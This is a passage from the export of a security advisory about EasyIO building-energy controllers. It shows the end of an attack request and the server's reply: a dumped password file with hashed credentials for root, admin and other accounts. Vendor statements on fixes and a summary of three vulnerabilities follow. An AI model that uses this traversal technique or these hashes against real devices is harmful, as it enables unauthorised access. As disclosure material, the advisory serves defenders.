id=\"crayon-58867eb52c078469555230-9\"><span class=\"crayon-v\">Cookie<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">PHPSESSID<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">7384531ce6f444710b42106a07b91e4c<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">PHPSESSID<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">7384531ce6f444710b42106a07b91e4c<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c078469555230-10\"><span class=\"crayon-v\">Connection<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">close<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0027 seconds] -->  <\/p>\n<p>Will receive from the server the following response:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58867eb52c07a306585545\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> HTTP\/1.1 200 OK  Date: Mon, 07 Mar 2016 03:21:24 GMT  Server: Embedthis-Appweb\/3.3.2  Content-Length: 390  Content-Type: text\/html  Connection: close  Pragma: no-cache  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0  Last-Modified: Mon, 07 Mar 2016 03:21:24 GMT  Content-type: text\/html  X-Powered-By: PHP\/5.3.10  Expires: Thu, 19 Nov 1981 08:52:00 GMT    {&#8220;data&#8221;: &#8220;root:r2PJOcraF5UZg:0:0:root:\/:\/bin\/sh  bin:*:1:1:bin:\/bin:  daemon:*:2:2:daemon:\/sbin:  nobody:*:99:99:Nobody:\/:  admin:tBVL4DWVHEbys:500:500:admin:\/:\/bin\/sh  sdcard:uu7RndQCc\/s.Q:501:501:sdcard:\/sdcard:\/bin\/sh  guest:1hK129p3FfneE:502:502:guest:\/mnt\/users\/guest:\/bin\/sh  webuser:xLhgTub5K6Css:503:503:webuser:\/mnt\/appweb\/web\/:\/bin\/sh  &#8220;,&#8221;actionPermitted&#8221;: &#8220;true&#8221;,&#8221;home_page&#8221;: &#8220;&#8221;}<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c07a306585545-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c07a306585545-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c07a306585545-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c07a306585545-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c07a306585545-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c07a306585545-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c07a306585545-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c07a306585545-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c07a306585545-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c07a306585545-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c07a306585545-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c07a306585545-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c07a306585545-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c07a306585545-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c07a306585545-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c07a306585545-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c07a306585545-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c07a306585545-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c07a306585545-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c07a306585545-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c07a306585545-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c07a306585545-22\">22<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58867eb52c07a306585545-1\"><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">200<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">OK<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c07a306585545-2\"><span class=\"crayon-v\">Date<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Mon<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">07<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">Mar<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2016<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">03<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">21<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">24<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">GMT<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c07a306585545-3\"><span class=\"crayon-v\">Server<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Embedthis<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Appweb<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">3.3.2<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c07a306585545-4\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Length<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">390<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c07a306585545-5\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Type<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-e\">html<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c07a306585545-6\"><span class=\"crayon-v\">Connection<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">close<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c07a306585545-7\"><span class=\"crayon-v\">Pragma<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">no<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">cache<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c07a306585545-8\"><span class=\"crayon-v\">Cache<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Control<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">no<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">store<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">no<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">cache<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">must<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">revalidate<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">post<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">check<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">pre<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">check<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c07a306585545-9\"><span class=\"crayon-v\">Last<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Modified<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Mon<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">07<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">Mar<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2016<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">03<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">21<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">24<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">GMT<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c07a306585545-10\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-i\">html<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c07a306585545-11\"><span class=\"crayon-v\">X<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Powered<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">By<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">PHP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">5.3.10<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c07a306585545-12\"><span class=\"crayon-v\">Expires<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Thu<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">19<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">Nov<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1981<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">08<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">52<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">GMT<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c07a306585545-13\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c07a306585545-14\"><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#8220;data&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;root:r2PJOcraF5UZg:0:0:root:\/:\/bin\/sh<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c07a306585545-15\"><span class=\"crayon-s\">bin:*:1:1:bin:\/bin:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c07a306585545-16\"><span class=\"crayon-s\">daemon:*:2:2:daemon:\/sbin:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c07a306585545-17\"><span class=\"crayon-s\">nobody:*:99:99:Nobody:\/:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c07a306585545-18\"><span class=\"crayon-s\">admin:tBVL4DWVHEbys:500:500:admin:\/:\/bin\/sh<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c07a306585545-19\"><span class=\"crayon-s\">sdcard:uu7RndQCc\/s.Q:501:501:sdcard:\/sdcard:\/bin\/sh<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c07a306585545-20\"><span class=\"crayon-s\">guest:1hK129p3FfneE:502:502:guest:\/mnt\/users\/guest:\/bin\/sh<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c07a306585545-21\"><span class=\"crayon-s\">webuser:xLhgTub5K6Css:503:503:webuser:\/mnt\/appweb\/web\/:\/bin\/sh<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c07a306585545-22\"><span class=\"crayon-s\">&#8220;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;actionPermitted&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;true&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;home_page&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0042 seconds] -->  <\/p>\n<p><strong><u>Vendor Response<\/u><\/strong><br \/> <u>Unauthenticated remote code execution<\/u> &#8211; This reported issue has been fixed in this week&#8217;s release (CPT tool , dated 11th Nov 2016). We have also fix all possible codes that can cause this issue. <\/p>\n<p><u>Unauthenticated database file download<\/u> &#8211; This had been fixed in previous version of FG firmware, we introduced an appweb configuration to fix this issue in around Feb, 2015. You can test this with our latest firmware or you could send this note to the person who reported this.<\/p>\n<p><u>Authenticated directory traversal vulnerability <\/u>&#8211; This has been fixed in this week&#8217;s release(CPT tool , dated 11th Nov 2016). I also fixed all possible codes that can cause this issue. <\/p>\n<\/p><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/2908\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Vulnerability Summary The following advisory describes three (3) vulnerabilities that allow to an attacker to gain unauthenticated remote code execution. EasyIO provides products for Building Energy Management Systems. Low costs, high energy savings. The three vulnerabilities found in EasyIO include: Unauthenticated remote code execution Unauthenticated database file download Authenticated directory traversal vulnerability The vulnerability affected &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/2908\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory &#8211; EasyIO Multiple Vulnerabilities<\/span> <span class=\"meta-nav\">&#8594;<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[10757],"class_list":["post-6272","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/6272","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=6272"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/6272\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=6272"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=6272"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=6272"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}